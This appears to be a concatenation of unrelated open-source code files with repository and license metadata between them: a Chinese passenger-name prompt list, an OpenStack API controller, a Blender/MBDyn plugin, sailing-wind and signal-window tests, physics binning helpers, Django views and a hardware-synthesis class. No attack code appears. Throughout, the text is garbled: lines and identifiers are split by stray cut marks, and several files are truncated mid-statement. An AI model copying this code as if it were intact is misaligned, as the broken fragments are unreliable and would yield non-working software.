namelist_question.append('您好,请问您的姓名是?')
namelist_question.append('请问您的姓名是?')
namelist_question.append('请告诉我您的姓名')
namelist_question.append('请您告诉我您的名字。')
namelist_question.append('请问您要购买机票的用户姓名是?')
namelist_question.append('请问您的名字是?')
namelist_question.append('请告知您的姓名。')
namelist_question.append('我们需要知道您的姓名。')
namelist_question.append('您怎么称呼?')
namelist_question.append('您的全名是什么?')
namelist_question.append('请提供您的全名。')
namelist_question.append('请输入您的全名。')
namelist_question.append('您叫什么名字啊?')
namelist_question.append('您的名字是什么?')
namelist_question.append('请告知您的名字。')
namelist_question.
|
append('请问尊姓大名?')
namelist_question.append('请输入乘客姓名。')
namelist_question.append('乘客的名字是什么?')
namelist_question.append('乘客怎么称呼?')
namelist_question.append('乘客叫
|
什么名字?')
namelist_question.append('乘客的姓名是?')
namelist_question.append('请问先生怎么称呼?')
namelist_question.append('请问小姐怎么称呼?')
namelist_question.append('请问老人家怎么称呼?')
namelist_question.append('先生您怎么称呼?')
namelist_question.append('小姐您怎么称呼?')
namelist_question.append('先生您叫什么名字?')
namelist_question.append('小姐您叫什么名字?')
namelist_question.append('您的名字?')
namelist_question.append('先生的名字?')
namelist_question.append('小姐的名字?')
namelist_question.append('乘客姓名?')
namelist_question.append('姓名?')
namelist_question.append('名字?')
namelist_question.append('可否请教先生名姓?')
namelist_question.append('小姐芳名可否见告?')
namelist_question.append('麻烦您说一下您的姓名可以吗?')
namelist_question.append('麻烦说下您的名字?谢谢。')
namelist_question.append('请告知姓名,谢谢。')
namelist_question.append('麻烦您告诉我您的名字,非常感谢。')
namelist_question_cut=[]
for ans in namelist_question:
w_sent=''
sent=jieba._lcut(ans)
for word in (sent):
w_sent +=' '
w_sent +=word
w_sent += '\n'
namelist_question_cut.append(w_sent)
pass
|
HybridF5/jacket
|
jacket/api/compute/openstack/compute/instance_actions.py
|
Python
|
apache-2.0
| 4,402
| 0
|
# Copyright 2013 Rackspace Hosting
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from webob import exc
from jacket.api.compute.openstack import common
from jacket.api.compute.openstack import extensions
from jacket.api.compute.openstack import wsgi
from jacket.compute import cloud
from jacket.i18n import _
from jacket.compute import utils
ALIAS = "os-instance-actions"
authorize = extensions.os_compute_authorizer(ALIAS)
soft_authorize = extensions.os_compute_soft_authorizer(ALIAS)
ACTION_KEYS = ['action', 'instance_uuid', 'request_id', 'user_id',
'project_id', 'start_time', 'message']
EVENT_KEYS = ['event', 'start_time', 'finish_time', 'result', 'traceback']
class InstanceActionsController(wsgi.Controller):
def __init__(self):
super(InstanceActionsController, self).__init__()
self.compute_api = cloud.API()
self.action_api = cloud.InstanceActionAPI()
def _format_action(self, action_raw):
action = {}
for key in ACTION_KEYS:
action[key] = action_raw.get(key)
return action
def _format_event(self, event_raw):
event = {}
for key in EVENT_KEYS:
event[key] = event_raw.get(key)
return event
@wsgi.Controller.api_version("2.1", "2.20")
def _get_instance(self, req, context, server_id):
return common.get_instance(self.compute_api, context, server_id)
@wsgi.Controller.api_version("2.21") # noqa
def _get_instance(self, req, context, server_id):
with utils.temporary_mutation(context, read_deleted='yes'):
return common.get_instance(self.compute_api, context, server_id)
@extensions.expected_errors(404)
def index(self, req, server_id):
"""Returns the list of actions recorded for a given instance."""
context = req.environ["compute.context"]
instance = self._get_instance(req, context, server_id)
authorize(context, target=instance)
actions_raw = self.action_api.actions_get(context, instance)
actions = [self._format_action(action) for action in actions_raw]
return {'instanceActions': actions}
@extensions.expected_errors(404)
def show(self, req, server_id, id):
"""Return data about the given instance action."""
context = req.environ['compute.context']
instance = self._get_instance(req, context, server_id)
authorize(context, target=instance)
action = self.action_api.action_get_by_request_id(context, instance,
id)
if action is None:
|
msg = _("Action %s not found") % id
raise exc.HTTPNotFound(explanation=msg)
action_id =
|
action['id']
action = self._format_action(action)
if soft_authorize(context, action='events'):
events_raw = self.action_api.action_events_get(context, instance,
action_id)
action['events'] = [self._format_event(evt) for evt in events_raw]
return {'instanceAction': action}
class InstanceActions(extensions.V21APIExtensionBase):
"""View a log of actions and events taken on an instance."""
name = "InstanceActions"
alias = ALIAS
version = 1
def get_resources(self):
ext = extensions.ResourceExtension(ALIAS,
InstanceActionsController(),
parent=dict(
member_name='server',
collection_name='servers'))
return [ext]
def get_controller_extensions(self):
"""It's an abstract function V21APIExtensionBase and the extension
will not be loaded without it.
"""
return []
|
louisgag/BlenderAndMBDyn
|
user_defined_element.py
|
Python
|
gpl-3.0
| 14,009
| 0.006781
|
# --------------------------------------------------------------------------
# BlenderAndMBDyn
# Copyright (C) 2015 G. Douglas Baldwin - http://www.baldwintechnology.com
# --------------------------------------------------------------------------
# ***** BEGIN GPL LICENSE BLOCK *****
#
# This file is part of BlenderAndMBDyn.
#
# BlenderAndMBDyn is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# BlenderAndMBDyn is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with BlenderAndMBDyn. If not, see <http://www.gnu.org/licenses/>.
#
# ***** END GPL LICENCE BLOCK *****
# --------------------------------------------------------------------------
if "bpy" in locals():
import imp
for x in [common, base]:
imp.reload(x)
else:
from . import common
from . import base
from .common import safe_name, Teardrop
from .base import bpy, BPY, root_dot, database, Entity, SelectedObjects
import bmesh, mathutils, math
klass_list = list()
class Sandbox(Entity):
def write(self, f):
f.write(
"\tuser defined: " + self.safe_name() + ", sandbox")
f.write(";\n")
class Constitutive:
constitutive = bpy.props.PointerProperty(type = BPY.Constitutive)
def prereqs(self, context):
self.constitutive.mandatory = True
self.constitutive.dimension = "3D"
def assign(self, context):
self.constitutive.assign(self.entity.constitutive)
def store(self, context):
self.entity.constitutive = self.constitutive.store()
self.entity.objects = self.sufficient_objects(context)
def draw(self, context):
self.constitutive.draw(self.layout, text="Constitutive")
def check(self, context):
return self.constitutive.check(context)
class SandboxOperator:
bl_label = "Sandbox"
@classmethod
def poll(cls, context):
return super().poll(context) and "libmodule-sandbox" in [x.value_type for x in database.input_card.filter("Module load")]
def create_entity(self):
return Sandbox(self.name)
klass_list.append((Sandbox, SandboxOperator))
class CollisionWorld(Entity):
file_ext = "usr"
labels = "F M F_X F_Y F_Z M_X M_Y M_Z".split()
def write(self, f):
f.write("\tuser defined: " + self.safe_name() + ", collision world, " + str(len(self.first)))
for i, x in enumerate(self.first):
f.write(",\n\t\t" + ", ".join([x.safe_name(), self.second[i].safe_name(), "reference, " + self.constitutive[i].safe_name()]))
f.write((",\n\t\tfriction function, \"" + self.function[i].name + "\", " + BPY.FORMAT(self.penetration[i])) if self.function[i] else "")
f.write(";\n")
class CollisionWorldOperator:
bl_label = "Collision world"
exclusive = True
N_objects = 0
first = bpy.props.CollectionProperty(type=BPY.Element)
second = bpy.props.CollectionProperty(type=BPY.Element)
constitutive = bpy.props.CollectionProperty(type=BPY.Constitutive)
penetration = bpy.props.CollectionProperty(type=BPY.Float)
function = bpy.props.CollectionProperty(type=BPY.Function)
N_pairs = bpy.props.IntProperty(min=1, max=50, name="Collision pairs", default=1)
@classmethod
def poll(cls, context):
return 1 < len(database.element.filter(["Box", "Capsule", "Cone", "Sphere"]))
def prereqs(self, context):
super().prereqs(context)
for collection in [self.first, self.second]:
collection.clear()
for i in range(50):
c = collection.add()
c.mandatory = True
c.group = "Collision object"
for i in range(50):
c = self.constitutive.add()
c.mandatory = True
c.dimension = "1D"
p = self.penetration.add()
p.mandatory = True
self.function.add()
def assign(self, context):
super().assign(context)
self.N_pairs = len(self.entity.first)
for i, value in enumerate(self.entity.first):
self.first[i].assign(value)
for i, value in enumerate(self.entity.second):
self.second[i].assign(value)
for i, value in enumerate(self.entity.constitutive):
self.constitutive[i].assign(value)
if hasattr(self.entity, "penetration"):
for i, value in enumerate(self.entity.penetration):
self.penetration[i].assign(value)
for i, value in enumerate(self.entity.function):
self.function[i].assign(value)
def store(self, context):
self.entity.first = [x.store() for x in self.first][:self.N_pairs]
self.entity.second = [x.store() for x in self.second][:self.N_pairs]
self.entity.constitutive = [x.store() for x in self.constitutive][:self.N_pairs]
self.entity.penetration = [x.store() for x in self.penetration][:self.N_pairs]
self.entity.function = [x.store() for x in self.function][:self.N_pairs]
self.entity.objects = [e.objects[0] for e in self.entity.first + self.entity.second]
self.entity.labels = list()
for i in range(self.N_pairs):
for x in CollisionWorld.labels:
self.entity.labels.append("_".join([x, str(i + 1)]))
def draw(self, context):
super().draw(context)
self.basis = self.N_pairs
layout = self.layout
layout.prop(self, "N_pairs")
for i in range(self.N_pairs):
layout.label("Pair-" + str(i + 1) + ":")
self.first[i].draw(layout, "")
self.second[i].draw(layout, "")
self.constitutive[i].draw(layout, "")
self.function[i].draw(layout, "Friction")
if self.function[i].select:
self.penetration[i].draw(layout, "Penetration ratio")
def check(self, context):
return (self.basis != self.N_pairs) or True in [(True in [x.check(context) for x in X]) for X in [self.first, self.second, self.constitutive, self.penetration, self.function]]
def create_entity(self):
return CollisionWorld(self.name)
klass_list.append((CollisionWorld, CollisionWorldOperator))
class CollisionObject(Entity):
group = "Collision object"
def write(self, f):
f.write("\tuser defined: " + self.safe_name() + ", collision object, " + BPY.FORMAT(self.material))
self.write_node(f, 0, node=True, position=True, orientation=True)
class Box(CollisionObject):
def write(self, f):
super().write(f)
f.write(",\n\t\tbtBoxShape, " + ", ".join([BPY.FORMAT(x) for x in [self.x, self.y, self.z,]]) + ", margin, " + BPY.FORMAT(self.margin) + ";\n")
def remesh(self):
bm = bmesh.new()
bmesh.ops.create_cube(bm, size=2.0*self.x)
for v in bm.verts:
v.co[1] = math.copysign(self.y, v.co[1])
v.co[2] = math.copysign(self.z, v.co[2])
bm.to_mesh(self.objects[0].data)
bm.free()
class Collision:
material = bpy.props.PointerProperty(type = BPY.Str)
@classmethod
def poll(cls, context):
return super().poll(context) and "libmodule-collision" in [x.value_type for x in database.input_card.filter("Module load")]
def prereqs(self, context):
self.material.man
|
datory = True
self.material.is_card = True
def assign(self, context):
self.material.assign(self.entity.material)
def store(self, context):
super().store(context)
self.entity.o
|
bjects[0].parent = self.entity.objects[1]
self.entity.objects[0].matrix_parent_inverse = self.entity.objects[1].matrix_basis.inverted()
self.entity.material = self.material.store()
self.entity.objects = self.sufficient_objects(context)
def draw(self, context):
sel
|
jrversteegh/softsailor
|
softsailor/vr/tst/test_vr_wind.py
|
Python
|
gpl-3.0
| 2,867
| 0.023021
|
import unittest
import testing_helper
from datetime import datetime, timedelta
from softsailor.utils import *
from softsailor.vr.vr_wind import *
from softsailor.vr.vr_weather import *
from softsailor.vr.vr_settings import *
class FakeWeather:
lat_min = 0
lat_max = 0.75
lat_n = 4
lon_min = -0.1
lon_max = 0.3
lon_n = 5
def __init__(self):
self.frames = []
self.datetimes = []
self.reltimes = []
self.lat_range = self.lat_max - self.lat_min
self.lat_step = self.lat_range / (self.lat_n - 1)
self.lon_range = self.lon_max - self.lon_min
self.lon_step = self.lon_range / (self.lon_n - 1)
now = datetime.utcnow()
self.start_datetime = now - timedelta(hours = 1)
self.datetimes.append(now - timedelta(hours = 1))
self.datetimes.append(now + timedelta(hours = 5))
self.datetimes.append(now + timedelta(hours = 11))
self.datetimes.append(now + timedelta(hours = 17))
self.reltimes.append(0)
self.reltimes.append(21600)
self.reltimes.append(43200)
self.reltimes.append(64800)
self.frames.append( \
[[(
|
2,1), (3,2), (4, 3), (5, 4), (5, 4)], \
[(3,1), (3,2), (3, 3), (3, 4), (5, 4)], \
[(4,-1), (4,-2), (4, -3), (4, -4), (5, 4)], \
[(4,-1), (4,-2), (4, -3), (4, -4), (5, 4)]])
self.frames.append( \
[[(3,1), (4,2), (5, 3), (6, 4), (5, 4)], \
[(4,1), (4,2), (4, 3), (5, 4), (5, 4)], \
[(5,-1), (5
|
,-2), (6, -3), (7, -4), (5, 4)], \
[(5,-1), (5,-2), (5, -3), (5, -4), (5, 4)]])
self.frames.append( \
[[(4,1), (5,2), (6, 3), (7, 4), (5, 4)], \
[(5,1), (5,2), (5, 3), (5, 4), (5, 4)], \
[(6,-1), (6,-2), (6, -3), (6, -4), (5, 4)], \
[(6,-1), (6,-2), (6, -3), (6, -4), (5, 4)]])
self.frames.append( \
[[(4,1), (5,2), (6, 3), (7, 4), (5, 4)], \
[(5,1), (5,2), (5, 3), (5, 4), (5, 4)], \
[(6,-1), (6,-2), (6, -3), (6, -4), (5, 4)], \
[(6,-1), (6,-2), (6, -3), (6, -4), (5, 4)]])
self.reltime_range = self.reltimes[-1]
self.reltime_n = len(self.reltimes)
def update_when_required(self):
return True
class TestWind(unittest.TestCase):
def setUp(self):
self.weather = FakeWeather()
self.wind = Wind(self.weather)
def tearDown(self):
self.wind = None
self.weather = None
def testGet(self):
t = datetime.utcnow() + timedelta(hours = 8)
#wind = self.wind.get((0.375, 0.1), t)
#self.assertAlmostEqual(3.1415, wind[0], 2)
#self.assertAlmostEqual(5.25, wind[1], 2)
if __name__ == '__main__':
unittest.main()
|
jrbourbeau/cr-composition
|
comptools/binning.py
|
Python
|
mit
| 5,322
| 0.000188
|
from collections import namedtuple
import numpy as np
def get_energybins(config='IC86.2012'):
"""Function to return analysis energy bin information
Parameters
----------
config : str, optional
Detector configuration (default is 'IC86.2012').
Returns
-------
energybins : namedtuple
Namedtuple containing analysis energy bin information.
"""
# Create EnergyBin namedtuple
energy_field_names = ['energy_min',
'energy_max',
'energy_bins',
'energy_midpoints',
'energy_bin_widths',
'log_energy_min',
'log_energy_max',
'log_energy_bin_width',
'log_energy_bins',
'log_energy_midpoints',
]
EnergyBin = namedtuple('EnergyBins', energy_field_names)
# Define energy range for this analysis
if 'IC79' in config:
log_energy_min = 6.1
log_energy_break = 8.0
log_energy_max = 9.0
log_energy_bins = np.concatenate(
(np.arange(log_energy_min, log_energy_break-0.1, 0.1),
np.arange(log_energy_break, log_energy_max+0.2, 0.2)))
elif 'IC86' in config:
log_energy_min = 6.1
log_energy_max = 8.0
log_energy_bins = np.arange(log_energy_min, log_energy_max+0.1, 0.1)
else:
raise ValueError(
'Invalid detector configuration entered: {}'.format(config))
log_energy_bin_width = log_energy_bins[1:] - log_energy_bins[:-1]
log_energy_midpoints = (log_energy_bins[1:]
|
+ log_energy_bins[:-1]) / 2
energy_min = 10**log_energy_min
energy_max = 10**log_
|
energy_max
energy_bins = 10**log_energy_bins
energy_midpoints = 10**log_energy_midpoints
energy_bin_widths = energy_bins[1:] - energy_bins[:-1]
# Create instance of EnergyBins with appropriate binning
energybins = EnergyBin(energy_min=energy_min,
energy_max=energy_max,
energy_bins=energy_bins,
energy_midpoints=energy_midpoints,
energy_bin_widths=energy_bin_widths,
log_energy_min=log_energy_min,
log_energy_max=log_energy_max,
log_energy_bin_width=log_energy_bin_width,
log_energy_bins=log_energy_bins,
log_energy_midpoints=log_energy_midpoints)
return energybins
def get_comp_bins(num_groups=2):
"""Function to return analysis composition bin information
Parameters
----------
num_groups : int, optional
Number of composition groups (default is 2).
Returns
-------
comp_bins : numpy.ndarray
Array containing analysis compsition bin edges.
"""
comp_bins = np.arange(num_groups + 1)
return comp_bins
def get_zenith_bins(zenith_bin_width=10):
"""Function to return analysis zenith bin information
Parameters
----------
num_groups : int, optional
Number of composition groups (default is 2).
Returns
-------
comp_bins : namedtuple
Namedtuple containing analysis zenith bin information.
"""
# Create ZenithBin namedtuple
zenith_field_names = ['zenith_min',
'zenith_max',
'zenith_bins',
'zenith_midpoints',
'zenith_bin_widths',
]
ZenithBin = namedtuple('ZenithBins', zenith_field_names)
# Define zenith range for this analysis
zenith_min = 0
zenith_max = 30
zenith_bins = np.arange(zenith_min,
zenith_max + zenith_bin_width,
zenith_bin_width)
zenith_bin_widths = zenith_bins[1:] - zenith_bins[:-1]
zenith_midpoints = (zenith_bins[1:] + zenith_bins[:-1]) / 2
# Create instance of ZenithBin with appropriate binning
zenithbins = ZenithBin(zenith_min=zenith_min,
zenith_max=zenith_max,
zenith_bins=zenith_bins,
zenith_midpoints=zenith_midpoints,
zenith_bin_widths=zenith_bin_widths)
return zenithbins
def get_bins(config='IC86.2012', num_groups=2, zenith_bin_width=10,
log_energy=True, include_zenith=False, return_columns=False):
# Energy bins
energybins = get_energybins(config=config)
if log_energy:
energy_bins = energybins.log_energy_bins
else:
energy_bins = energybins.energy_bins
# Composition bins
comp_bins = get_comp_bins(num_groups=num_groups)
bins = [energy_bins, comp_bins]
columns = ['reco_log_energy', 'pred_comp_target']
# Zenith bins
if include_zenith:
zenith_bins = get_zenith_bins(zenith_bin_width=zenith_bin_width).zenith_bins
bins.append(zenith_bins)
columns.append('lap_zenith')
if return_columns:
return bins, columns
else:
return bins
def bin_edges_to_midpoints(bin_edges):
midpoints = (bin_edges[1:] + bin_edges[:-1]) / 2
return midpoints
|
sostenibilidad-unam/posgrado
|
posgradmin/posgradmin/views_academico.py
|
Python
|
gpl-3.0
| 17,170
| 0.003554
|
# coding: utf-8
from django.contrib.auth.mixins import LoginRequiredMixin
from django.contrib.auth.mixins import UserPassesTestMixin
from django.views.generic import ListView
from django.views import View
from django.db.models import Q
import posgradmin.models as models
from posgradmin import authorization as auth
from django.conf import settings
from django.shortcuts import render, HttpResponseRedirect
import posgradmin.forms as forms
from dal import autocomplete
from django.urls import reverse
from django.forms.models import model_to_dict
from pdfrw import PdfReader, PdfWriter, PageMerge
from django.template.loader import render_to_string
from sh import pandoc, mkdir
from tempfile import NamedTemporaryFile
import datetime
from django.utils.text import slugify
from .settings import BASE_DIR, MEDIA_ROOT, MEDIA_URL
class AcademicoAutocomplete(LoginRequiredMixin, UserPassesTestMixin, autocomplete.Select2QuerySetView):
login_url = settings.APP_PREFIX + 'accounts/login/'
def test_func(self):
if auth.is_academico(self.request.user):
if self.request.user.academico.acreditacion in ['D', 'M', 'P', 'E',
'candidato profesor']:
return True
return False
def get_queryset(self):
qs = models.Academico.objects.filter(Q(acreditacion='candidato profesor')
| Q(acreditacion='P')
| Q(acreditacion='M')
| Q(acreditacion='D')
| Q(acreditacion='E'))
if self.q:
qs = qs.filter(Q(user__first_name__istartswith=self.q)
| Q(user__last_name__icontains=self.q))
return qs
class ProponerAsignatura(LoginRequiredMixin, UserPassesTestMixin, View):
login_url = settings.APP_PREFIX + 'accounts/login/'
template = 'posgradmin/proponer_asignatura.html'
form_class = forms.AsignaturaModelForm
def test_func(self):
if auth.is_academico(self.request.user):
if self.request.user.academico.acreditacion in ['D', 'M', 'P',
'candidato profesor']:
return True
return False
def get(self, request, *args, **kwargs):
form = self.form_class(initial={'academicos': [request.user.academico, ]})
breadcrumbs = ((settings.APP_PREFIX + 'inicio/', 'Inicio'),
('', 'Proponer Asignatura')
)
return render(request,
self.template,
{
'title': 'Proponer Asignatura',
'breadcrumbs': breadcrumbs,
'form': form
})
def post(self, request, *args, **kwargs):
form = self.form_class(request.POST, request.FILES)
if form.is_valid():
a = models.Asignatura(
asignatura=request.POST['asignatura'],
tipo='Optativa',
estado='propuesta',
programa=request.FILES['programa'])
a.save()
return HttpResponseRedirect(reverse('inicio'))
else:
print(form.errors)
class SolicitaCurso(LoginRequiredMixin, UserPassesTestMixin, View):
login_url = settings.APP_PREFIX + 'accounts/login/'
template = 'posgradmin/solicita_curso.html'
form_class = forms.CursoModelForm
def test_func(self):
if auth.is_academico(self.request.user):
if self.request.user.academico.acreditacion in ['D', 'M', 'P', 'E',
'candidato profesor']:
return True
return False
def get(self, request, *args, **kwargs):
convocatoria = models.ConvocatoriaCurso.objects.get(pk=int(kwargs['pk']))
if convocatoria.status == 'cerrada':
return HttpResponseRedirect(reverse('mis_cursos'))
asignatura = models.Asignatura.objects.get(pk=int(kwargs['as_id']))
form = self.form_class(initial={'academicos': [request.user.academico, ]})
breadcrumbs = ((settings.APP_PREFIX + 'inicio/', 'Inicio'),
(reverse('elige_asignatura', args=[convocatoria.id,]),
"Convocatoria para cursos %s-%s" % (convocatoria.year, convocatoria.semestre))
)
return render(request,
self.template,
{
'title': 'Solicitar curso',
'breadcrumbs': breadcrumbs,
'convocatoria': convocatoria,
'asignatura': asignatura,
'form': form
})
def post(self, request, *args, **kwargs):
convocatoria = models.ConvocatoriaCurso.objects.get(pk=int(kwargs['pk']))
if convocatoria.status == 'cerrada':
return HttpResponseRedirect(reverse('mis_cursos'))
asignatura = models.Asignatura.objects.get(pk=int(kwargs['as_id']))
form = self.form_class(request.POST)
if form.is_valid():
curso = models.Curso(
convocatoria=convocatoria,
asignatura=asignatura,
year=convocatoria.year,
semestre=convocatoria.semestre,
sede=reques
|
t.POST['sede'],
aula=request.POST['aula'],
horario=request.POST['horario'])
curso.save()
for ac_id in request.POST.getlist('academicos'):
ac =
|
models.Academico.objects.get(pk=int(ac_id))
curso.academicos.add(ac)
curso.academicos.add(request.user.academico)
curso.save()
return HttpResponseRedirect(reverse('mis_cursos'))
class CursoView(LoginRequiredMixin, UserPassesTestMixin, View):
login_url = settings.APP_PREFIX + 'accounts/login/'
template = 'posgradmin/solicita_curso.html'
form_class = forms.CursoModelForm
def test_func(self):
curso = models.Curso.objects.get(pk=int(self.kwargs['pk']))
if auth.is_academico(self.request.user):
if self.request.user.academico.acreditacion in ['D', 'M', 'P', 'E',
'candidato profesor']:
if self.request.user.academico in curso.academicos.all():
return True
return False
def get(self, request, *args, **kwargs):
curso = models.Curso.objects.get(pk=int(kwargs['pk']))
form = self.form_class(initial=model_to_dict(curso))
breadcrumbs = ((reverse('inicio'), 'Inicio'),
(reverse('mis_cursos'), "Mis cursos"))
return render(request,
self.template,
{
'title': 'Editar curso',
'breadcrumbs': breadcrumbs,
'convocatoria': curso.convocatoria,
'asignatura': curso.asignatura,
'form': form
})
def post(self, request, *args, **kwargs):
curso = models.Curso.objects.get(pk=int(kwargs['pk']))
convocatoria = curso.convocatoria
if convocatoria.status == 'cerrada':
return HttpResponseRedirect(reverse('mis_cursos'))
asignatura = curso.asignatura
form = self.form_class(request.POST)
if form.is_valid():
curso.sede = request.POST['sede']
curso.aula = request.POST['aula']
curso.horario = request.POST['horario']
curso.save()
curso.academicos.clear()
for ac_id in request.POST.getlist('academicos'):
ac = models.Academico.objects.get(pk=int(ac_id))
curso.academicos.add(ac)
curso.save()
return HttpResponseRedirect(reverse('mis_cursos'))
class CursoConstancia(LoginRequiredMixin, Use
|
Nic30/HWToolkit
|
hwt/synthesizer/dummyPlatform.py
|
Python
|
mit
| 775
| 0.002581
|
from hwt.synthesizer.rtlLevel.extract_part_drivers import extract_part_drivers
from hwt.synthesizer.rtlLevel.remove_unconnected_signals import removeUnconnectedSignals
from hwt.synthesizer.rtlLevel.mark_visibility_of_signals_and_check_drivers import markVisibilityOfSignalsAndCheckDrivers
class DummyPlatform():
"""
:note: all processors has to be callable with only one parameter
which is actual Unit/RtlNetlist instance
"""
|
def __init__(self):
self.beforeToRtl = []
self.beforeToRtlImpl = []
self.afterToRtlImpl = []
self.beforeHdlArchGeneration = [
extract_part_drivers,
removeUnconnectedS
|
ignals,
markVisibilityOfSignalsAndCheckDrivers,
]
self.afterToRtl = []
|
eranroz/dnase
|
src/scripts/HMMTrainRegions.py
|
Python
|
mit
| 2,526
| 0.002771
|
"""
This script trains a model based on different regions of chromosome 1,
and evaluates the model as the likelihood of it for the whole chromosome 2.
Useful to know whether it is sufficient to train only based on smaller data
"""
import os
import numpy as np
from config import RES_DIR
from data_provider import SeqLoader
from data_provider.DiscreteTransformer import DiscreteTransformer
from hmm import bwiter
from hmm.HMMModel import DiscreteHMM
__author__ = 'eranroz'
MODEL_EVALUATION_RESULTS = os.path.join(RES_DIR, 'modelEvaluation')
resolution = 100
iterations = 7
res_file = open(os.path.join(MODEL_EVALUATION_RESULTS, 'trainRegions.10n100.%s.txt' % str(resolution)), 'w')
training = SeqLoader.load_dict('UW.Fetal_Brain.ChromatinAccessibility.H-22510.DS11872', resolution,
DiscreteTransformer())
chromosomeLength = len(training['chr1'])
for regionSize in [10, 100]:
res_file.write('region sizes %s' % (str(regionSize)))
res_matrix = np.zeros(regionSize)
max_p = -999999999
max_region = None
for itera, start in enumerate(np.arange(0, chromosomeLength, chromosomeLength / regionSize)):
|
region = training['chr1'][start: start + chromosomeLength / regionSize]
state_transition = np.array(
[
[0.0, 0.99, 0.01], # begin
|
[0.3, 0.9, 0.1], # open (may go to close but prefers to keep the state)
[0.7, 0.1, 0.9] # closed (very small change to get to open)
]
)
emission = np.array([
np.zeros(4),
[0.02, 0.4, 0.5, 0.08], # open - prefers high values
[0.8, 0.1, 0.09, 0.01], # closed - prefers low values
])
model = DiscreteHMM(state_transition, emission)
res_file.write('-------------------')
res_file.write('Trained on region: %s - %s' % (str(start), str(start + chromosomeLength / 10)))
new_model, p = bwiter.bw_iter(region, model, iterations)
#res_file.write(str(new_model))
bw_output = new_model.forward_backward(training['chr2'])
res_file.write('Likelihood (chr2): %s' % str(bw_output.model_p))
res_matrix[itera] = bw_output.model_p
if bw_output.model_p > max_p:
max_p = bw_output.model_p
max_region = str(start)
print('likelihood as function of region in chromosome 1')
print(str(res_matrix))
print('Max region: %s' % max_region)
print('Max P: %s' % max_p)
res_file.close()
print('Finished')
|
cokelaer/spectrum
|
test/test_window.py
|
Python
|
bsd-3-clause
| 9,764
| 0.013212
|
from spectrum import *
from numpy.testing import assert_almost_equal
import pytest
def test_class_Window():
w = Window(65, name='hann')
w.enbw
w.mean_square
w.frequencies
w.plot_time_freq()
w.compute_response(NFFT=32)
try:
w = Window(64, name='wrong')
assert False
except:
assert True
w.info()
print(w)
# recompute response
w = Window(65, name='hann')
w.response
w.plot_frequencies(maxdB=120, mindB=-100)
try:
w
|
= Window(65, name="dummy")
assert False
except:
assert True
#unittest of create_window
def test_create_window_error():
try:
create_window('dummy')
assert False
except:
assert True
#test that create_window(N, name) works for all valid names
@pytest.mark.parametrize('tes
|
t_window_name,length',
[(name, size) for name, size in zip(window_names.keys(), [1,51,52])])
def test_create_window(test_window_name, length):
create_window(length, name=test_window_name)
#test that create_window(N, name) is indeed equivalent to the direct call window_name
@pytest.mark.parametrize("name,param",
[('blackman', {'alpha':2}),
('kaiser', {'beta':8.6}),
('gaussian', {'alpha':2.5}),
('chebwin', {'attenuation': 50}),
('flattop', {'mode':'symmetric'}),
('tukey', {'r': 0.5}),
('poisson', {'alpha': 2}),
('poisson_hanning', {'alpha': 2}),
('cauchy', {'alpha': 3})])
def test_check_window_switch(name, param):
f = eval('window_'+name)
w1 = f(64, **param)
w2 = create_window(64, name, **param)
for x,y in zip(w1,w2):
assert x==y
def test_create_window_others():
try:
create_window(11, "hamming", dummy=1)
assert False
except ValueError:
assert True
try:
create_window(11, "kaiser", beta=0.5)
create_window(11, "kaiser", dummy=1)
assert False
except ValueError:
assert True
def test_bartlett():
"""unit and functional test window_bartlett"""
vec7 = array([ 0., 0.33333333, 0.66666667, 1., 0.66666667, 0.33333333, 0.])
vec8 = array([ 0., 0.28571429, 0.57142857, 0.85714286, 0.85714286, 0.57142857, 0.28571429, 0.])
for x, y in zip(window_bartlett(8), vec8):
assert_almost_equal(x, y)
for x, y in zip(window_bartlett(7), vec7):
assert_almost_equal(x, y)
def test_kaiser():
"""unit and functional test window_kaiser"""
vec8 = array([ 0.00133251, 0.09113651, 0.45964377, 0.92046158, 0.92046158, 0.45964377, 0.09113651, 0.00133251])
vec7 = array([ 0.00133251, 0.13040195, 0.63041193, 1. , 0.63041193, 0.13040195, 0.00133251])
for x, y in zip(window_kaiser(8), vec8):
assert_almost_equal(x, y)
for x, y in zip(window_kaiser(7), vec7):
assert_almost_equal(x, y)
window_kaiser(8, method='other')
window_kaiser(8, method='numpy')
assert window_kaiser(1, method='numpy') == np.array([1])
def test_blackman():
"""unit and functional test window_bartlett"""
vec8 = array([ -1.38777878e-17, 9.04534244e-02, 4.59182958e-01, 9.20363618e-01, 9.20363618e-01, 4.59182958e-01, 9.04534244e-02, -1.38777878e-17])
vec7 = array([ -1.38777878e-17, 1.30000000e-01, 6.30000000e-01, 1.00000000e+00, 6.30000000e-01, 1.30000000e-01, -1.38777878e-17])
for x, y in zip(window_blackman(8), vec8):
assert_almost_equal(x, y)
for x, y in zip(window_blackman(7), vec7):
assert_almost_equal(x, y)
for x, y in zip(window_blackman(7, alpha=0.16), vec7):
assert_almost_equal(x, y)
assert window_blackman(1, alpha=0.16) == np.array([1])
def test_hann():
"""unit and functional test window_bartlett"""
vec7 = array([ 0. , 0.25, 0.75, 1. , 0.75, 0.25, 0. ])
vec8 = array([ 0. , 0.1882551 , 0.61126047, 0.95048443, 0.95048443, 0.61126047, 0.1882551 , 0. ])
for x, y in zip(window_hann(8), vec8):
assert_almost_equal(x, y)
for x, y in zip(window_hann(7), vec7):
assert_almost_equal(x, y)
def test_hammming():
"""unit and functional test window_hamming"""
vec8 = array([ 0.08 , 0.25319469, 0.64235963, 0.95444568, 0.95444568, 0.64235963, 0.25319469, 0.08 ])
vec7 = array([ 0.08, 0.31, 0.77, 1. , 0.77, 0.31, 0.08])
for x, y in zip(window_hamming(8), vec8):
assert_almost_equal(x, y)
for x, y in zip(window_hamming(7), vec7):
assert_almost_equal(x, y)
def test_chebwin():
"""unit and functional test chebwin"""
